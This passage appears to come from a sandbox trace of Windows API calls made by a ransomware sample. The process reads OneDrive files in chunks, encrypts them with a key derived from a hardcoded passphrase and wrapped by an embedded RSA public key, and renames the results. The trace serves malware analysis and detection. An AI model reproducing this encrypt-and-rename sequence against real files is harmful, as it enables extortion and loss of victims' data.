CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.190] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.190] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.190] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.190] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.190] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.190] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.190] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.190] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.190] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.190] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.190] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.191] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.191] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.191] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.191] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.191] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.191] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.191] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.191] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.191] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.191] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.191] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.191] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.191] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.191] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.192] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.192] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.192] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.192] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.192] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.192] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.192] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.192] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.193] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.193] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.193] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.193] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.193] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.193] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.193] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.194] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.194] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.194] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.194] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.194] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.194] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.194] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x15f, lpOverlapped=0x0) returned 1 [0271.194] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x15f, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x160) returned 1 [0271.194] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x160, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x160, lpOverlapped=0x0) returned 1 [0271.194] CloseHandle (hObject=0x5d3c) returned 1 [0271.194] CloseHandle (hObject=0x5d48) returned 1 [0271.194] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ExclusionList.xml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\exclusionlist.xml.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ExclusionList.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\exclusionlist.xml"), bFailIfExists=0) returned 1 [0271.198] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ExclusionList.xml", dwFileAttributes=0x0) returned 1 [0271.198] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ExclusionList.xml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\exclusionlist.xml.gsg")) returned 1 [0271.199] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ExclusionList.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\exclusionlist.xml"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ExclusionList.xml.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\exclusionlist.xml.fuck")) returned 1 [0271.201] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0271.201] CryptDestroyKey (hKey=0x2fa948) returned 1 [0271.201] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0271.201] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0271.201] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0271.201] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0271.201] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0271.201] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0271.201] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0271.201] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0271.201] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\is\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa748 [0271.202] FindNextFileA (in: hFindFile=0x2fa748, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0271.202] FindNextFileA (in: hFindFile=0x2fa748, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0271.202] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0271.203] GetLastError () returned 0x0 [0271.204] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\is\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\is\\filesync.localizedresources.dll.mui")) returned 0x20 [0271.204] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\is\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0271.204] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\is\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\is\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0271.205] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\is\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\is\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0271.206] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\is\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0271.207] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f27e58) returned 1 [0271.209] CryptCreateHash (in: hProv=0x2f27e58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0271.209] lstrlenA (lpString="gRZNKRGLTXaVulDshFSSTuldzMlQm") returned 29 [0271.210] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb710, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0271.210] CryptDeriveKey (in: hProv=0x2f27e58, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fa788) returned 1 [0271.210] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0271.210] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0271.210] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f28760) returned 1 [0271.210] CryptImportPublicKeyInfo (in: hCryptProv=0x2f28760, dwCertEncodingType=0x1, pInfo=0x2f321c0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f321f0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f321f8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fa948) returned 1 [0271.210] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0271.210] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f27ee0*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f27ee0*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0271.211] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f27ee0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f27ee0*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0271.212] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.224] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.224] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.225] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.225] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.225] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.225] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.225] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.225] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.226] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.226] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.226] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.226] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.248] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.248] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.248] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.248] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.248] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.248] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.248] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.248] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, 